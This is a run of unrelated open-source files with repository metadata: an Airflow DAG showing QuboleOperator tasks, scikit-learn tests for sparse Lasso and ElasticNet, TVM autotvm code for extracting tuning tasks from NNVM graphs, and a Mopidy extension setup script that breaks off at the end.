from airflow import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from airflow.contrib.operators.qubole_operator import QuboleOperator
import filecmp
import random
default_args = {
'owner': 'airflow',
'depends_on_past': False,
    'start_date': airflow.utils.dates.days_ago(2),
'email': ['airflow@airflow.com'],
'email_on_failure': False,
'email_on_retry': False
}
# NOTE: This is only an example DAG to highlight usage of QuboleOperator in various scenarios,
# some of the tasks may or may not work based on your QDS account setup
dag = DAG('example_qubole_operator', default_args=default_args, schedule_interval='@daily')
def compare_result(ds, **kwargs):
ti = kwargs['ti']
r1 = t1.get_results(ti)
r2 = t2.get_results(ti)
return filecmp.cmp(r1, r2)
t1 = QuboleOperator(
task_id='hive_show_table',
command_type='hivecmd',
query='show tables',
cluster_label='default',
fetch_logs=True, # If true, will fetch qubole command logs and concatenate them into corresponding airflow task logs
    tags='airflow_example_run',  # To attach tags to qubole command, auto attach 3 tags - dag_id, task_id, run_id
qubole_conn_id='qubole_default', # Connection id to submit commands inside QDS, if not set "qubole_default" is used
dag=dag)
t2 = QuboleOperator(
task_id='hive_s3_location',
command_type="hivecmd",
script_location="s3n://public-qubole/qbol-library/scripts/show_table.hql",
    notify=True,
tags=['tag1', 'tag2'],
# If the script at s3 location has any qubole specific macros to be replaced
# macros='[{"date": "{{ ds }}"}, {"name" : "abc"}]',
trigger_rule="all_done",
dag=dag)
t3 = PythonOperator(
task_id='compare_result',
provide_context=True,
python_callable=compare_result,
trigger_rule="all_done",
dag=dag)
t3.set_upstream(t1)
t3.set_upstream(t2)
options = ['hadoop_jar_cmd', 'presto_cmd', 'db_query', 'spark_cmd']
branching = BranchPythonOperator(
task_id='branching',
python_callable=lambda: random.choice(options),
dag=dag)
branching.set_upstream(t3)
join = DummyOperator(
task_id='join',
trigger_rule='one_success',
dag=dag
)
t4 = QuboleOperator(
task_id='hadoop_jar_cmd',
command_type='hadoopcmd',
sub_command='jar s3://paid-qubole/HadoopAPIExamples/jars/hadoop-0.20.1-dev-streaming.jar -mapper wc -numReduceTasks 0 -input s3://paid-qubole/HadoopAPITests/data/3.tsv -output s3://paid-qubole/HadoopAPITests/data/3_wc',
cluster_label='default',
fetch_logs=True,
dag=dag)
t5 = QuboleOperator(
task_id='pig_cmd',
command_type="pigcmd",
script_location="s3://public-qubole/qbol-library/scripts/script1-hadoop-s3-small.pig",
parameters="key1=value1 key2=value2",
trigger_rule="all_done",
dag=dag)
t4.set_upstream(branching)
t5.set_upstream(t4)
t5.set_downstream(join)
t6 = QuboleOperator(
task_id='presto_cmd',
command_type='prestocmd',
query='show tables',
dag=dag)
t7 = QuboleOperator(
task_id='shell_cmd',
command_type="shellcmd",
script_location="s3://public-qubole/qbol-library/scripts/shellx.sh",
parameters="param1 param2",
trigger_rule="all_done",
dag=dag)
t6.set_upstream(branching)
t7.set_upstream(t6)
t7.set_downstream(join)
t8 = QuboleOperator(
task_id='db_query',
command_type='dbtapquerycmd',
query='show tables',
db_tap_id=2064,
dag=dag)
t9 = QuboleOperator(
task_id='db_export',
command_type='dbexportcmd',
mode=1,
hive_table='default_qubole_airline_origin_destination',
db_table='exported_airline_origin_destination',
partition_spec='dt=20110104-02',
dbtap_id=2064,
trigger_rule="all_done",
dag=dag)
t8.set_upstream(branching)
t9.set_upstream(t8)
t9.set_downstream(join)
t10 = QuboleOperator(
task_id='db_import',
command_type='dbimportcmd',
mode=1,
hive_table='default_qubole_airline_origin_destination',
db_table='exported_airline_origin_destination',
where_clause='id < 10',
db_parallelism=2,
dbtap_id=2064,
trigger_rule="all_done",
dag=dag)
prog = '''
import scala.math.random
import org.apache.spark._
/** Computes an approximation to pi */
object SparkPi {
def main(args: Array[String]) {
val conf = new SparkConf().setAppName("Spark Pi")
val spark = new SparkContext(conf)
val slices = if (args.length > 0) args(0).toInt else 2
val n = math.min(100000L * slices, Int.MaxValue).toInt // avoid overflow
val count = spark.parallelize(1 until n, slices).map { i =>
val x = random * 2 - 1
val y = random * 2 - 1
if (x*x + y*y < 1) 1 else 0
}.reduce(_ + _)
println("Pi is roughly " + 4.0 * count / n)
spark.stop()
}
}
'''
t11 = QuboleOperator(
task_id='spark_cmd',
command_type="sparkcmd",
program=prog,
language='scala',
arguments='--class SparkPi',
    tags='airflow_example_run',
dag=dag)
t11.set_upstream(branching)
t11.set_downstream(t10)
t10.set_downstream(join)
|
{
"content_hash": "b7ed0f4a45c5a8aaed589e3830c4ded2",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 223,
"avg_line_length": 29.309278350515463,
"alnum_prop": 0.6843123461132606,
"repo_name": "saguziel/incubator-airflow",
"id": "fce017515f8ffc7762dffe5ab8988078529e359c",
"size": "5686",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "airflow/contrib/example_dags/example_qubole_operator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "56979"
},
{
"name": "HTML",
"bytes": "145974"
},
{
"name": "JavaScript",
"bytes": "1364212"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "1843559"
},
{
"name": "Shell",
"bytes": "19680"
}
],
"symlink_target": ""
}
|
import numpy as np
from numpy.testing import assert_allclose
import pytest
import scipy.sparse as sp
from sklearn.datasets import make_regression
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import create_memmap_backed_data
from sklearn.utils._testing import ignore_warnings
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model import Lasso, ElasticNet, LassoCV, ElasticNetCV
def test_sparse_coef():
# Check that the sparse_coef property works
clf = ElasticNet()
clf.coef_ = [1, 2, 3]
assert sp.isspmatrix(clf.sparse_coef_)
assert clf.sparse_coef_.toarray().tolist()[0] == clf.coef_
def test_lasso_zero():
# Check that the sparse lasso can handle zero data without crashing
X = sp.csc_matrix((3, 1))
y = [0, 0, 0]
T = np.array([[1], [2], [3]])
clf = Lasso().fit(X, y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0])
assert_array_almost_equal(pred, [0, 0, 0])
assert_almost_equal(clf.dual_gap_, 0)
@pytest.mark.parametrize("with_sample_weight", [True, False])
def test_enet_toy_list_input(with_sample_weight):
# Test ElasticNet for various values of alpha and l1_ratio with list X
X = np.array([[-1], [0], [1]])
X = sp.csc_matrix(X)
Y = [-1, 0, 1] # just a straight line
T = np.array([[2], [3], [4]]) # test sample
if with_sample_weight:
sw = np.array([2.0, 2, 2])
else:
sw = None
# this should be the same as unregularized least squares
clf = ElasticNet(alpha=0, l1_ratio=1.0)
# catch warning about alpha=0.
# this is discouraged but should work.
ignore_warnings(clf.fit)(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(pred, [2, 3, 4])
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.3)
clf.fit(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.50819], decimal=3)
assert_array_almost_equal(pred, [1.0163, 1.5245, 2.0327], decimal=3)
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.5)
clf.fit(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.45454], 3)
assert_array_almost_equal(pred, [0.9090, 1.3636, 1.8181], 3)
assert_almost_equal(clf.dual_gap_, 0)
def test_enet_toy_explicit_sparse_input():
# Test ElasticNet for various values of alpha and l1_ratio with sparse X
f = ignore_warnings
# training samples
X = sp.lil_matrix((3, 1))
X[0, 0] = -1
# X[1, 0] = 0
X[2, 0] = 1
Y = [-1, 0, 1] # just a straight line (the identity function)
# test samples
T = sp.lil_matrix((3, 1))
T[0, 0] = 2
T[1, 0] = 3
T[2, 0] = 4
# this should be the same as lasso
clf = ElasticNet(alpha=0, l1_ratio=1.0)
f(clf.fit)(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(pred, [2, 3, 4])
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.3)
clf.fit(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.50819], decimal=3)
assert_array_almost_equal(pred, [1.0163, 1.5245, 2.0327], decimal=3)
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.5)
clf.fit(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.45454], 3)
assert_array_almost_equal(pred, [0.9090, 1.3636, 1.8181], 3)
assert_almost_equal(clf.dual_gap_, 0)
def make_sparse_data(
n_samples=100,
n_features=100,
n_informative=10,
seed=42,
positive=False,
n_targets=1,
):
random_state = np.random.RandomState(seed)
# build an ill-posed linear regression problem with many noisy features and
# comparatively few samples
# generate a ground truth model
w = random_state.randn(n_features, n_targets)
w[n_informative:] = 0.0 # only the top features are impacting the model
if positive:
w = np.abs(w)
X = random_state.randn(n_samples, n_features)
rnd = random_state.uniform(size=(n_samples, n_features))
X[rnd > 0.5] = 0.0 # 50% of zeros in input signal
# generate training ground truth labels
y = np.dot(X, w)
X = sp.csc_matrix(X)
if n_targets == 1:
y = np.ravel(y)
return X, y
def _test_sparse_enet_not_as_toy_dataset(alpha, fit_intercept, positive):
n_samples, n_features, max_iter = 100, 100, 1000
n_informative = 10
X, y = make_sparse_data(n_samples, n_features, n_informative, positive=positive)
X_train, X_test = X[n_samples // 2 :], X[: n_samples // 2]
y_train, y_test = y[n_samples // 2 :], y[: n_samples // 2]
s_clf = ElasticNet(
alpha=alpha,
l1_ratio=0.8,
fit_intercept=fit_intercept,
max_iter=max_iter,
tol=1e-7,
positive=positive,
warm_start=True,
)
s_clf.fit(X_train, y_train)
assert_almost_equal(s_clf.dual_gap_, 0, 4)
assert s_clf.score(X_test, y_test) > 0.85
# check the convergence is the same as the dense version
d_clf = ElasticNet(
alpha=alpha,
l1_ratio=0.8,
fit_intercept=fit_intercept,
max_iter=max_iter,
tol=1e-7,
positive=positive,
warm_start=True,
)
d_clf.fit(X_train.toarray(), y_train)
assert_almost_equal(d_clf.dual_gap_, 0, 4)
assert d_clf.score(X_test, y_test) > 0.85
assert_almost_equal(s_clf.coef_, d_clf.coef_, 5)
assert_almost_equal(s_clf.intercept_, d_clf.intercept_, 5)
# check that the coefs are sparse
assert np.sum(s_clf.coef_ != 0.0) < 2 * n_informative
def test_sparse_enet_not_as_toy_dataset():
_test_sparse_enet_not_as_toy_dataset(alpha=0.1, fit_intercept=False, positive=False)
_test_sparse_enet_not_as_toy_dataset(alpha=0.1, fit_intercept=True, positive=False)
_test_sparse_enet_not_as_toy_dataset(alpha=1e-3, fit_intercept=False, positive=True)
_test_sparse_enet_not_as_toy_dataset(alpha=1e-3, fit_intercept=True, positive=True)
def test_sparse_lasso_not_as_toy_dataset():
n_samples = 100
max_iter = 1000
n_informative = 10
X, y = make_sparse_data(n_samples=n_samples, n_informative=n_informative)
X_train, X_test = X[n_samples // 2 :], X[: n_samples // 2]
y_train, y_test = y[n_samples // 2 :], y[: n_samples // 2]
s_clf = Lasso(alpha=0.1, fit_intercept=False, max_iter=max_iter, tol=1e-7)
s_clf.fit(X_train, y_train)
assert_almost_equal(s_clf.dual_gap_, 0, 4)
assert s_clf.score(X_test, y_test) > 0.85
# check the convergence is the same as the dense version
d_clf = Lasso(alpha=0.1, fit_intercept=False, max_iter=max_iter, tol=1e-7)
d_clf.fit(X_train.toarray(), y_train)
assert_almost_equal(d_clf.dual_gap_, 0, 4)
assert d_clf.score(X_test, y_test) > 0.85
# check that the coefs are sparse
assert np.sum(s_clf.coef_ != 0.0) == n_informative
def test_enet_multitarget():
n_targets = 3
X, y = make_sparse_data(n_targets=n_targets)
estimator = ElasticNet(alpha=0.01, precompute=False)
# XXX: There is a bug when precompute is not False!
estimator.fit(X, y)
coef, intercept, dual_gap = (
estimator.coef_,
estimator.intercept_,
estimator.dual_gap_,
)
for k in range(n_targets):
estimator.fit(X, y[:, k])
assert_array_almost_equal(coef[k, :], estimator.coef_)
assert_array_almost_equal(intercept[k], estimator.intercept_)
assert_array_almost_equal(dual_gap[k], estimator.dual_gap_)
def test_path_parameters():
X, y = make_sparse_data()
max_iter = 50
n_alphas = 10
clf = ElasticNetCV(
n_alphas=n_alphas,
eps=1e-3,
max_iter=max_iter,
l1_ratio=0.5,
fit_intercept=False,
)
ignore_warnings(clf.fit)(X, y) # new params
assert_almost_equal(0.5, clf.l1_ratio)
assert n_alphas == clf.n_alphas
assert n_alphas == len(clf.alphas_)
sparse_mse_path = clf.mse_path_
ignore_warnings(clf.fit)(X.toarray(), y) # compare with dense data
assert_almost_equal(clf.mse_path_, sparse_mse_path)
@pytest.mark.parametrize("Model", [Lasso, ElasticNet, LassoCV, ElasticNetCV])
@pytest.mark.parametrize("fit_intercept", [False, True])
@pytest.mark.parametrize("n_samples, n_features", [(24, 6), (6, 24)])
@pytest.mark.parametrize("with_sample_weight", [True, False])
def test_sparse_dense_equality(
Model, fit_intercept, n_samples, n_features, with_sample_weight
):
X, y = make_regression(
n_samples=n_samples,
n_features=n_features,
effective_rank=n_features // 2,
n_informative=n_features // 2,
bias=4 * fit_intercept,
noise=1,
random_state=42,
)
if with_sample_weight:
sw = np.abs(np.random.RandomState(42).normal(scale=10, size=y.shape))
else:
sw = None
Xs = sp.csc_matrix(X)
params = {"fit_intercept": fit_intercept}
reg_dense = Model(**params).fit(X, y, sample_weight=sw)
reg_sparse = Model(**params).fit(Xs, y, sample_weight=sw)
if fit_intercept:
assert reg_sparse.intercept_ == pytest.approx(reg_dense.intercept_)
# balance property
assert np.average(reg_sparse.predict(X), weights=sw) == pytest.approx(
np.average(y, weights=sw)
)
assert_allclose(reg_sparse.coef_, reg_dense.coef_)
def test_same_output_sparse_dense_lasso_and_enet_cv():
X, y = make_sparse_data(n_samples=40, n_features=10)
clfs = ElasticNetCV(max_iter=100)
clfs.fit(X, y)
clfd = ElasticNetCV(max_iter=100)
clfd.fit(X.toarray(), y)
assert_almost_equal(clfs.alpha_, clfd.alpha_, 7)
assert_almost_equal(clfs.intercept_, clfd.intercept_, 7)
assert_array_almost_equal(clfs.mse_path_, clfd.mse_path_)
assert_array_almost_equal(clfs.alphas_, clfd.alphas_)
clfs = LassoCV(max_iter=100, cv=4)
clfs.fit(X, y)
clfd = LassoCV(max_iter=100, cv=4)
clfd.fit(X.toarray(), y)
assert_almost_equal(clfs.alpha_, clfd.alpha_, 7)
assert_almost_equal(clfs.intercept_, clfd.intercept_, 7)
assert_array_almost_equal(clfs.mse_path_, clfd.mse_path_)
assert_array_almost_equal(clfs.alphas_, clfd.alphas_)
def test_same_multiple_output_sparse_dense():
l = ElasticNet()
X = [
[0, 1, 2, 3, 4],
[0, 2, 5, 8, 11],
[9, 10, 11, 12, 13],
[10, 11, 12, 13, 14],
]
y = [
[1, 2, 3, 4, 5],
[1, 3, 6, 9, 12],
[10, 11, 12, 13, 14],
[11, 12, 13, 14, 15],
]
l.fit(X, y)
sample = np.array([1, 2, 3, 4, 5]).reshape(1, -1)
predict_dense = l.predict(sample)
l_sp = ElasticNet()
X_sp = sp.coo_matrix(X)
l_sp.fit(X_sp, y)
sample_sparse = sp.coo_matrix(sample)
predict_sparse = l_sp.predict(sample_sparse)
assert_array_almost_equal(predict_sparse, predict_dense)
def test_sparse_enet_coordinate_descent():
"""Test that a warning is issued if model does not converge"""
clf = Lasso(max_iter=2)
n_samples = 5
n_features = 2
X = sp.csc_matrix((n_samples, n_features)) * 1e50
y = np.ones(n_samples)
warning_message = (
"Objective did not converge. You might want "
"to increase the number of iterations."
)
with pytest.warns(ConvergenceWarning, match=warning_message):
clf.fit(X, y)
@pytest.mark.parametrize("copy_X", (True, False))
def test_sparse_read_only_buffer(copy_X):
"""Test that sparse coordinate descent works for read-only buffers"""
rng = np.random.RandomState(0)
clf = ElasticNet(alpha=0.1, copy_X=copy_X, random_state=rng)
X = sp.random(100, 20, format="csc", random_state=rng)
# Make X.data read-only
X.data = create_memmap_backed_data(X.data)
y = rng.rand(100)
clf.fit(X, y)
|
{
"content_hash": "eea847fb86c479fd30c305460a988691",
"timestamp": "",
"source": "github",
"line_count": 370,
"max_line_length": 88,
"avg_line_length": 32.413513513513514,
"alnum_prop": 0.6285333110981406,
"repo_name": "betatim/scikit-learn",
"id": "7434729819716d022f3e6ddc246f27bbb2391bf0",
"size": "11993",
"binary": false,
"copies": "5",
"ref": "refs/heads/main",
"path": "sklearn/linear_model/tests/test_sparse_coordinate_descent.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "42335"
},
{
"name": "C++",
"bytes": "147316"
},
{
"name": "Cython",
"bytes": "668499"
},
{
"name": "Makefile",
"bytes": "1644"
},
{
"name": "Python",
"bytes": "10504881"
},
{
"name": "Shell",
"bytes": "41551"
}
],
"symlink_target": ""
}
|
"""
Decorator and utilities for the integration with TOPI and NNVM
"""
import warnings
import logging
from ... import tensor, placeholder, create_schedule, target as _target
from ..util import get_const_tuple
from .task import create, register
logger = logging.getLogger('autotvm')
def serialize_args(args):
"""serialize arguments of a topi function to a hashable tuple.
Parameters
----------
args: list of hashable or Tensor
"""
ret = []
for t in args:
if isinstance(t, tensor.Tensor):
ret.append(('TENSOR', get_const_tuple(t.shape), t.dtype))
else:
ret.append(t)
return tuple(ret)
def deserialize_args(args):
"""The inverse function of :code:`serialize_args`.
Parameters
----------
args: list of hashable or Tensor
"""
ret = []
for t in args:
if isinstance(t, tuple) and t[0] == 'TENSOR':
ret.append(placeholder(shape=t[1], dtype=t[2]))
else:
ret.append(t)
return ret
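# --- Illustrative sketch (not part of the original module) ---
# A minimal round trip through serialize_args/deserialize_args, assuming a
# working tvm installation so that `placeholder` is importable. Tensor
# arguments are reduced to ('TENSOR', shape, dtype) tuples, which makes the
# whole argument list hashable and therefore usable as a task key:
#
#     data = placeholder((1, 3, 224, 224), dtype='float32')
#     key = serialize_args([data, 'NCHW', 'float32'])
#     # key == (('TENSOR', (1, 3, 224, 224), 'float32'), 'NCHW', 'float32')
#     restored = deserialize_args(key)
#     # restored[0] is a fresh placeholder with the same shape and dtype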
# Task extractor for nnvm graph
class TaskExtractEnv:
"""Global environment for extracting tuning tasks from nnvm graph"""
current = None
def __init__(self):
import topi
import nnvm
# NOTE: To add more symbols, you only need to change the following lists
# nnvm symbol -> topi compute
self.symbol2topi = {
nnvm.sym.conv2d: [topi.nn.conv2d, topi.nn.depthwise_conv2d_nchw],
nnvm.sym.conv2d_transpose: [topi.nn.conv2d_transpose_nchw],
nnvm.sym.dense: [topi.nn.dense],
}
# topi compute -> autotvm task name
self.topi_to_task = {
topi.nn.conv2d: "topi_nn_conv2d",
topi.nn.depthwise_conv2d_nchw: "topi_nn_depthwise_conv2d_nchw",
topi.nn.conv2d_transpose_nchw: "topi_nn_conv2d_transpose_nchw",
topi.nn.dense: "topi_nn_dense",
}
self.topi_to_schedule = {
topi.nn.conv2d: [topi.generic.schedule_conv2d_nchw,
topi.generic.schedule_conv2d_nhwc],
topi.nn.depthwise_conv2d_nchw: [topi.generic.schedule_depthwise_conv2d_nchw,
topi.generic.schedule_depthwise_conv2d_nhwc],
topi.nn.conv2d_transpose_nchw: [topi.generic.schedule_conv2d_transpose_nchw],
topi.nn.dense: [topi.generic.schedule_dense],
}
self._register_tracing()
self._register_topi_task()
self.task_collection = []
self.wanted_topi_funcs = list(self.topi_to_task.keys())
def _register_tracing(self):
"""Register tracing function to track the topi function call"""
# register topi compute for "tracing" target
for topi_compute in self.topi_to_task:
def _local_scope(compute_func):
"""start a scope to hold the local function in for loop"""
@compute_func.register("tracing", )
def _tracing_topi_compute(*args, **kwargs):
assert not kwargs, "Do not support extracting tuning tasks when" \
"kwargs is used in TOPI function call." \
"Please modify it to use only positional args."
if compute_func in self.wanted_topi_funcs: # record this call
key = (self.topi_to_task[compute_func], serialize_args(args))
if key not in self.task_collection:
self.task_collection.append(key)
return compute_func.fdefault(*args)
_local_scope(topi_compute)
# register topi schedule for "tracing" target
for topi_compute in self.topi_to_task:
for topi_schedule in self.topi_to_schedule[topi_compute]:
def _local_scope_(schedule_func):
"""start a scope to hold the local function in for loop"""
@schedule_func.register("tracing", )
def _tracing_topi_compute(outs):
outs = [outs] if isinstance(outs, tensor.Tensor) else outs
return create_schedule([x.op for x in outs])
_local_scope_(topi_schedule)
def _register_topi_task(self):
"""register tuning wrapper for topi function"""
import topi
# Tuning wrapper for topi functions
@register("topi_nn_conv2d")
def _topi_nn_conv2d(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
layout = args[-2]
assert layout == 'NCHW', "only support NCHW currently"
C = topi.nn.conv2d(*args, **kwargs)
s = topi.generic.schedule_conv2d_nchw([C])
return s, [A, W, C]
@register("topi_nn_depthwise_conv2d_nchw")
def _topi_nn_depthwise_conv2d_nchw(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
C = topi.nn.depthwise_conv2d_nchw(*args, **kwargs)
s = topi.generic.schedule_depthwise_conv2d_nchw([C])
return s, [A, W, C]
@register("topi_nn_conv2d_transpose_nchw")
def _topi_nn_conv2d_transpose_nchw(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
C = topi.nn.conv2d_transpose_nchw(*args, **kwargs)
s = topi.generic.schedule_conv2d_transpose_nchw([C])
return s, [A, W, C]
@register("topi_nn_dense")
def _topi_nn_dense(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
data, weight, bias = args
C = topi.nn.dense(*args, **kwargs)
s = topi.generic.schedule_dense([C])
if bias is not None:
return s, [data, weight, bias, C]
return s, [data, weight, C]
def reset(self, wanted_topi_funcs):
"""Reset task collections
Parameters
----------
wanted_topi_funcs: List of function
The topi function to be extracted
"""
self.task_collection = []
self.wanted_topi_funcs = wanted_topi_funcs
def get_tasks(self):
"""Get collected tasks
Returns
-------
tasks: List of tuple(name, args)
A list of tasks extracted from the nnvm graph
"""
return self.task_collection
@staticmethod
def get():
"""Get the single instance of TaskExtractEnv
Returns
-------
env: TaskExtractEnv
The single instance of TaskExtractEnv
"""
if not TaskExtractEnv.current:
TaskExtractEnv.current = TaskExtractEnv()
return TaskExtractEnv.current
def extract_from_graph(graph, shape, dtype, target, symbols, target_host=None):
""" Extract tuning tasks from a nnvm graph.
This function collects tuning tasks by building the graph
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
graph : Graph
The graph to tune
shape : dict of str to tuple
The input shape to the graph
dtype : str or dict of str to str
The input types to the graph
target: tvm.target.Target
The compilation target
symbols : Array of nnvm.symbol
Array of nnvm symbols to be tuned
target_host: tvm.target.Target
The host compilation target
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
import nnvm.compiler
env = TaskExtractEnv.get()
topi_funcs = []
for sym_name in symbols:
if sym_name in env.symbol2topi:
topi_funcs.extend(env.symbol2topi[sym_name])
else:
warnings.warn("Symbol %s is not tunable, ignored" % sym_name)
# run compiler to collect all TOPI calls during compilation
env.reset(topi_funcs)
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
# use a "tracing" target to do a fake compile for collecting topi calls
tracing_target = _target.create("llvm -device=tracing")
nnvm.compiler.engine.clear_cache()
nnvm.compiler.build(graph, target=tracing_target, shape=shape, dtype=dtype)
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
tasks.append(create(task_name, args,
target=target, target_host=target_host,
template_key='direct'))
return tasks
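# --- Illustrative sketch (not part of the original module) ---
# Hypothetical use of extract_from_graph, assuming an nnvm graph built from a
# frontend model. Only the symbols listed in TaskExtractEnv.symbol2topi
# (conv2d, conv2d_transpose, dense) are extracted; anything else triggers a
# warning and is skipped:
#
#     tasks = extract_from_graph(
#         graph,
#         shape={'data': (1, 3, 224, 224)},
#         dtype='float32',
#         target=_target.create('cuda'),
#         symbols=(nnvm.sym.conv2d, nnvm.sym.dense))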
def extract_from_multiple_graph(graphs, shapes, dtypes, target, symbols, target_host=None):
""" Extract tuning tasks from multiple nnvm graphs.
This function is the multiple graph version of extract_from_graph
Parameters
----------
graphs : List of Graph
The list of graphs to tune
shapes : List of dict of str to tuple
The input shape to the graph
dtypes : List of str or dict of str to str
The input types to the graph
target: tvm.target.Target
The compilation target
symbols : Array of nnvm.symbol
Array of nnvm symbols to be tuned
target_host: tvm.target.Target
The host compilation target
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
import nnvm.compiler
env = TaskExtractEnv.get()
topi_funcs = []
for sym_name in symbols:
if sym_name in env.symbol2topi:
topi_funcs.extend(env.symbol2topi[sym_name])
else:
warnings.warn("Symbol %s is not tunable, ignored" % sym_name)
# run compiler to collect all TOPI calls during compilation
env.reset(topi_funcs)
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
# use a "tracing" target to do a fake compile for collecting topi calls
tracing_target = _target.create("llvm -device=tracing")
nnvm.compiler.engine.clear_cache()
for graph, shape, dtype in zip(graphs, shapes, dtypes):
nnvm.compiler.build(graph, target=tracing_target, shape=shape, dtype=dtype)
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
tasks.append(create(task_name, args,
target=target, target_host=target_host,
template_key='direct'))
return tasks
|
{
"content_hash": "4c635befce21cf789bf7049d7114ab14",
"timestamp": "",
"source": "github",
"line_count": 320,
"max_line_length": 91,
"avg_line_length": 33.734375,
"alnum_prop": 0.5910143584993053,
"repo_name": "mlperf/training_results_v0.6",
"id": "80b62229a34ed6d502c9a993a38dc54da87ab6a3",
"size": "10842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Fujitsu/benchmarks/resnet/implementations/mxnet/3rdparty/tvm/python/tvm/autotvm/task/nnvm_integration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13941"
},
{
"name": "C",
"bytes": "208630"
},
{
"name": "C++",
"bytes": "10999411"
},
{
"name": "CMake",
"bytes": "129712"
},
{
"name": "CSS",
"bytes": "64767"
},
{
"name": "Clojure",
"bytes": "396764"
},
{
"name": "Cuda",
"bytes": "2272433"
},
{
"name": "Dockerfile",
"bytes": "67820"
},
{
"name": "Groovy",
"bytes": "62557"
},
{
"name": "HTML",
"bytes": "19753082"
},
{
"name": "Java",
"bytes": "166294"
},
{
"name": "JavaScript",
"bytes": "71846"
},
{
"name": "Julia",
"bytes": "408765"
},
{
"name": "Jupyter Notebook",
"bytes": "2713169"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "115694"
},
{
"name": "Perl",
"bytes": "1535873"
},
{
"name": "Perl 6",
"bytes": "7280"
},
{
"name": "PowerShell",
"bytes": "6150"
},
{
"name": "Python",
"bytes": "24905683"
},
{
"name": "R",
"bytes": "351865"
},
{
"name": "Roff",
"bytes": "293052"
},
{
"name": "Scala",
"bytes": "1189019"
},
{
"name": "Shell",
"bytes": "794096"
},
{
"name": "Smalltalk",
"bytes": "3497"
},
{
"name": "TypeScript",
"bytes": "361164"
}
],
"symlink_target": ""
}
|
from .rarity import RarityStrategy
|
{
"content_hash": "189aee03465ccd64822e450dcb1b93bb",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 34,
"avg_line_length": 35,
"alnum_prop": 0.8571428571428571,
"repo_name": "vtemian/university_projects",
"id": "6b561204ab5a2d3b7a745c234f7a6e761f145631",
"size": "35",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_structures/bitorrent/client/strategies/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "15965"
},
{
"name": "C++",
"bytes": "9417"
},
{
"name": "Python",
"bytes": "69909"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
from setuptools import find_packages, setup
def get_version(filename):
with open(filename) as fh:
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", fh.read()))
return metadata['version']
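# For reference, get_version() expects the target file to contain metadata
# lines of the form (hypothetical example):
#
#     __version__ = '0.1.0'
#
# The regex collects every "__name__ = 'value'" pair into a dict and the
# 'version' entry is returned.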
setup(
name='Mopidy-Raspberry-Jam',
version=get_version('mopidy_raspberryjam/__init__.py'),
url='https://github.com/VeryBigCorp/mopidy-raspberryjam',
license='Apache License, Version 2.0',
author='Ryan Babaie and Evan Thomas',
author_email='yeeeeah',
description='Web Client for Social Music Playing via the Raspberry Pi or other Embedded Devices',
long_description=open('README.rst').read(),
packages=find_packages(exclude=['tests', 'tests.*']),
zip_safe=False,
include_package_data=True,
install_requires=[
'setuptools',
'Mopidy >= 1.0',
'Pykka >= 1.1',
],
entry_points={
'mopidy.ext': [
'raspberryjam = mopidy_raspberryjam:Extension',
],
},
classifiers=[
'Environment :: No Input/Output (Daemon)',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Topic :: Multimedia :: Sound/Audio :: Players',
],
)
|
{
"content_hash": "1ee37752cf41a8cb0e38bb598b028f21",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 101,
"avg_line_length": 31,
"alnum_prop": 0.6129032258064516,
"repo_name": "VeryBigCorp/mopidy-raspberryjam",
"id": "329e27f39e9df48831b1dc34e38cbc1f43f188ce",
"size": "1364",
"binary": false,
"copies": "1",
